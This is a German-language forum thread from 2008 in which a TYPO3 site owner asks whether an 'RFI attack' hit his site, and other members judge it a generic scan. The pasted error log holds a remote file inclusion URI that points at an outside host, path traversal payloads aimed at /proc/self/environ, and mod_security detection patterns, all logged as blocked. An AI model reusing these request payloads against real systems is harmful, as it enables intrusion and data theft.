"RFI Attack" weis da Jemand bescheid?

  • masta masta
    R2-D2
    0 x
    83 Beiträge
    0 Hilfreiche Beiträge
    20. 09. 2008, 13:16

    Hallo zusammen,

    als ich mich heute in eines meiner Typo3-Projekte einloggte merkte ich dass das Backend total "zerhackt" (im Sinne von: keine Stylesheets mehr geladen) ist und im Frontend die Seiten nicht mehr vollständig angezeigt werden. In der error.log auf dem Server entdeckte ich eigenartige Einträge mit denen ich zwar nichts anfangen kann aber danach "googelte" z.Bsp.: [uri "//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i???"]
    worauf ich dann auch einen Aktuellen Beitrag in einem englischsprachigen Forum entdeckte.

    [url]http://www.boonex.com/unity/forums/topic/New-RFI-Dolphin-Security-Alerts.htm[/url]

    Dort wird etwas von einer "RFI attack" geschrieben und ich denke dass es mein Projekt auch betrifft, weis aber nicht genau ob ich damit richtig liege und wie ich nun vorgehen kann.
    Bitte helft mir bei meinen Sorgen.
    Vielen Dank!
    Mario


  • 1
  • just2b just2b
    TYPO3-Yoda
    0 x
    18741 Beiträge
    2 Hilfreiche Beiträge
    20. 09. 2008, 13:18

    Hallo,

    phpbb ist phpbb und nicht typo3... #paralyzed# kenn mich nicht ganz aus

    georg

  • masta masta
    R2-D2
    0 x
    83 Beiträge
    0 Hilfreiche Beiträge
    20. 09. 2008, 13:28

    Hallo Georg,

    Vielen Dank für Deine Antwort. Es betrifft jedenfalls eine Typo3 Version 4.1.7 gehostet bei hostprofis.at und das sind die ersten 7 Zeilen der error.log:

    [Sat Sep 20 00:29:41 2008] [error][client 85.31.1.45] mod_security: Access denied with code 403. Pattern match "\\\\.ph(p(3|4)?).*path=(http|https|ftp)\\\\:/" at REQUEST_URI [severity "EMERGENCY"] [hostname "www.xxxxxxxxxx.at"] [uri "//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.vogelgesang-av.de/cache/DONTDELETEFAGOT/i???"]
    [Sat Sep 20 00:29:41 2008] [error][client 85.31.1.45] File does not exist: /home/spohplhl/www.xxxxxxxx.at/errors.php
    [Sat Sep 20 00:29:42 2008] [error][client 85.31.1.45] mod_security: Access denied with code 403. Pattern match "\\\\.\\\\./\\\\.\\\\./" at REQUEST_URI [id "300004"] [rev "2"] [msg "Generic Path Recursion denied"] [severity "CRITICAL"] [hostname "www.xxxxxxxxxx.at"] [uri "//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=/../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ"]
    [Sat Sep 20 00:29:42 2008] [error][client 85.31.1.45] mod_security: Access denied with code 403. Error normalising REQUEST_URI: Invalid character detected [0][severity "EMERGENCY"] [hostname "www.xxxxxxxxx.at"] [uri "//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00"]
    /usr/bin/gm identify: Missing an image filename.
    /usr/bin/gm identify: Missing an image filename.
    /usr/bin/gm identify: Missing an image filename.
    ...
    ich habe mich noch nie mit phpbb beschäftigt deshalb kann ich auch nicht sagen was es damit aufsich hat.

    LG Mario

  • just2b just2b
    TYPO3-Yoda
    0 x
    18741 Beiträge
    2 Hilfreiche Beiträge
    20. 09. 2008, 13:34

    Hallo,

    das schaut mir eher nach einem generischen angriffsversuch an, wo auf alle möglichen domains alles mögliche losgelassen wird. mehr muss dir der hoster sagen können.
    Nach einem TYPO3-spezifischen Angriff schaut das nicht aus

    georg

  • masta masta
    R2-D2
    0 x
    83 Beiträge
    0 Hilfreiche Beiträge
    20. 09. 2008, 13:42

    ...ok das hilft mir auch schon sehr weiter.

    Vielen Dank dafür!

    LG Mario

  • Stoneage Stoneage
    Jedi-General
    0 x
    1143 Beiträge
    0 Hilfreiche Beiträge
    25. 09. 2008, 21:36

    Das sieht aus, als ob jemand den phpbb-admin Pfad auslesen will.

  • 1